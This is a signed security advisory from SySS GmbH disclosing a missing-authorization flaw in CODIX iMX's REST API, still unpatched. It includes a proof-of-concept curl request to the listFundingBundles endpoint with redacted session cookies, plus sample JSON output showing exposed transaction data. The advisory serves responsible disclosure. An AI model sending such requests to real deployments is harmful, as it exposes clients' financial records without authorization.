-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2026-011 Product: iMX Manufacturer: CODIX Affected Version(s): N.A. Tested Version(s): N.A. Vulnerability Type: Missing Authorization (CWE-862) Risk Level: High Solution Status: Open Manufacturer Notification: 2026-02-27 Solution Date: - Public Disclosure: 2026-04-30 CVE Reference: Not yet assigned Author of Advisory: Brian Ottmann, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: iMX is an enterprise management system covering contracts, receivables, financing, factoring, credit insurance, loans, leasing, collections, legal disputes, and more. The manufacturer describes the product as follows (see [1]): "iMX is the result of many years of research and development at the heart of the first European technopolis: Sophia Antipolis, on the French Riviera, near Nice. iMX is an innovative solution which handles - within its unique technical environment - 100% of the industry-standard functions of various service businesses as well as the particular requirements of each Client." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The application utilizes a REST API for its functionality and does not perform any authorization checks when a user without access to transaction data accesses the data via the API. By accessing a specific resource, a user with the knowledge of the "decompte" parameter can view the corresponding client's transaction history, even if the corresponding permission is not set in the back end. As the value of the "decompte" parameter is being used during regular interaction with other functionality of the application, it cannot be treated as secret. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. Log in with valid credentials and a user without the "ec_cf_fund_req_follow_up" permissions and obtain a valid session. 2. Send an API request to /iMX/api/be/fundingTransactions/listFundingBundles?decompte=[...]&bankAccount=&requestDateFrom=&requestDateTo=&executionDateFrom=&executionDateTo=&status=&page=1&size=10&sort=requestDate,desc === curl https://[customer]/iMX/api/be/fundingTransactions/listFundingBundles?decompte=[...]&bankAccount=&requestDateFrom=&requestDateTo=&executionDateFrom=&executionDateTo=&status=&page=1&size=10&sort=requestDate,desc -H 'Cookie: JSESSIONID=23A643[...]_extranet; TS017643b5=01ba5b14022a9c[...]223a364cf183; user-language=de; TS011db4b4=01ba5b140[...]00223a364cf183; TS710d5612027=0853fd53ccab[...]0fc02d68dcdf496dfaccfea2112ff82dca2bb79d84f6' -k | jq % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 4288 0 4288 0 0 4653 0 0 { "content": [ { "refer": "[...]", "requestDate": [...], "executionDate": null, "amount": 871268.49, "currency": "EUR", "bank": "[...]", "bankIndividu": "[...]", "iban": "ÜBERWEISUNG - [...], "status": "Genehmigt", "statusAbrev": "PM_ST_APP", "bundleGpiressort": "NO_BUNDLES", "totalCount": 2108, "pieceAmount": "[...]", "clientId": "[...]", "isExportAvailable": false, "bankUniqueId": "[...]" (OUTPUT SHORTENED) "last": true, "first": true, "numberOfElements": 10, "size": 10, "number": 0 } === ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: N.A. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2026-02-26: Vulnerability discovered 2026-02-27: Vulnerability reported to manufacturer 2026-03-09: Contacted different contact person 2026-03-27: Contact retry 2026-04-30: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for iMX https://www.codix.eu/en/software/about-imx [2] SySS Security Advisory SYSS-2026-011 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2026-011.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Brian Ottmann of SySS GmbH. E-Mail: brian.ottmann@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Brian_Ottmann.asc PGP-Fingerprint: CBDF 14A4 83A9 4C31 5861 CF4F 78B4 D7D8 E8E6 65B1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEy98UpIOpTDFYYc9PeLTX2OjmZbEFAmny/Q4ACgkQeLTX2Ojm ZbHrfA//YveOcQuEsZI5kjPHcMx7J3GpnMVa35z1lVWRVTqHdgj0+Chk9hb1GjJX jTmEEpahg8zJrXLrrQvon/1HGeuTNEH8omzHUXrAYJ7uGA1R0QH9Ui858mpu7jJA 60zP3QvvR6W/7rHoIxLHsHcUSNX4iAs7HGAtJr1Q05e7medgtRZSLl2rapXV/hEW XByi5C46S/hDZfVzOvUR+v1q00+G84m7xv69Q2M9TofuvUlF/LuByK8JyONEUreJ F7nUYs+kiEQfSpPTbB3KJC7siobX6psPsfD/jT4NICJZc//Exn0BNbMlD2KEEHqs 9iY5bqlWH5a/HNXO8fe8a5BnWL603WJ6ArRaKlGRlLlwXSUO9p8TmdiquoiagIdG mlgglJfcJdzrSsCwkVt1aEk35fnqD39Qj3T+hvw2W61jAk6SA2zqYOrjDOvxlMvu wgSCz+5Shm8ozK8UGL1uwMraOxn9K7wUEOQJhs/4pKQgE+88DqA+QjZvdoWA0dNG Z9cY5FQf7NKza5eONSl6p7pMIEyAJZLUy8RkkwHjzmluGQESG8t5N51rQRV98k0X 0osCURUOn48b8VH3L8nWqnHIvcKV62B47cmSED0gMWnPAcz7WthYEQu9k2fsLCGm Yk0wRYUsg1fv3c7MJCCf8UEvjKHC/V1Rsutk/kuBZHE+CWosY/4= =RQnY -----END PGP SIGNATURE-----